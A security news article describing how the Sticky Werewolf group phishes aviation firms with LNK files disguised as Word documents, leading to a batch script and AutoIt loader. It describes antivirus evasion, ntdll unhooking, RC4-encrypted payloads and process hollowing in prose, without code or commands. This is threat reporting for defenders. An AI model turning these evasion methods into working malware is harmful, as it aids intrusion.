Sticky Werewolf Weaponizing LNK Files Group Attacking To Attack Organizations

Sticky Werewolf, a cyber threat group, has shifted its targeting strategy from sending phishing emails with download links to malicious files to using archive attachments containing LNK files, which act as shortcuts to malicious executables hosted on WebDAV servers. 

When a user clicks on the LNK, a batch script is triggered, which in turn launches an AutoIt script designed to deliver the final payload, which bypasses traditional phishing tactics and injects malware directly if the user executes the LNK file. 

Infection Chain

A cyberespionage group, Sticky Werewolf, is targeting the aviation industry with phishing emails disguised as business invitations from a legitimate Russian aerospace company, AO OKB Kristall, where the emails contain an archive attachment with two malicious LNK files masquerading as DOCX documents and a decoy PDF file.

With ANYRUN You can Analyze any URL, Files & Email for Malicious Activity : Start your Analysis

Clicking the LNK files triggers a Batch script that launches an AutoIt script to ultimately deliver the final payload, which is a significant shift from Sticky Werewolf’s previous tactics of using links to download malware directly from file-sharing platforms. 

Phishing Email

A phishing email with a decoy PDF attachment targets enterprises related to Russian helicopters, as the PDF mentions a video conference and references two malicious LNK files disguised as meeting documents. 

Clicking the LNK files triggers an NSIS self-extracting archive, a variant of the CypherIT crypter, to download and run a malicious executable from a network share.

The extracted files land in the Internet Explorer temporary files directory, and then a batch script is executed. 

Pdf

Two malicious LNK files, disguised as Word documents, target users, and clicking either LNK triggers a sequence of events, as first, the LNK adds a registry entry to run a compromised WINWORD.exe on login persistently. 

Then, it displays a decoy error message to distract the user. The first LNK copies a potentially deceptive image file, while the second LNK behaves similarly, launching a malicious WINWORD.exe. 

Batch Script

A batch script within the LNK delays execution if specific antivirus processes are running and potentially renames files to evade detection.

Finally, the script combines a legitimate AutoIt executable with a malicious script and executes them. 

Processes monitored by the Batch script and their corresponding security vendors.

This malicious AutoIT script aims to evade detection, establish persistence, and check for signatures of security environments and debuggers. It injects a clean copy of ntdll.dll to bypass hooking, effectively unhooking any monitoring attempts. 

Persistence is achieved through scheduled tasks or startup directory modifications, where the payload, hidden within the script, is decrypted using a two-stage RC4 process with a user-defined passphrase. 

According to Morphisec, the decrypted and decompressed payload is injected via process hollowing into a legitimate AutoIT process, making it harder to detect.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo 

Aman Mishra

Recent Posts

Node.js systeminformation Package Vulnerability Exposes Millions of Systems to RCE Attacks

A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing millions…

22 hours ago

Skuld Malware Using Weaponized Windows Utilities Packages To Deliver Malware

Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer through…

2 days ago

BellaCiao, A new .NET Malware With Advanced Sophisticated Techniques

An investigation revealed an intrusion in Asia involving the BellaCiao .NET malware, as the initial…

2 days ago

Malicious Apps On Amazon Appstore Records Screen And Interecpt OTP Verifications

A seemingly benign health app, "BMI CalculationVsn," was found on the Amazon App Store, which…

2 days ago

Lazarus Hackers Using New VNC Based Malware To Attack Organizations Worldwide

The Lazarus Group has recently employed a sophisticated attack, dubbed "Operation DreamJob," to target employees…

2 days ago

New Python NodeStealer Attacking Facebook Business To Steal Login Credentials

NodeStealer, initially a JavaScript-based malware, has evolved into a more sophisticated Python-based threat that targets…

2 days ago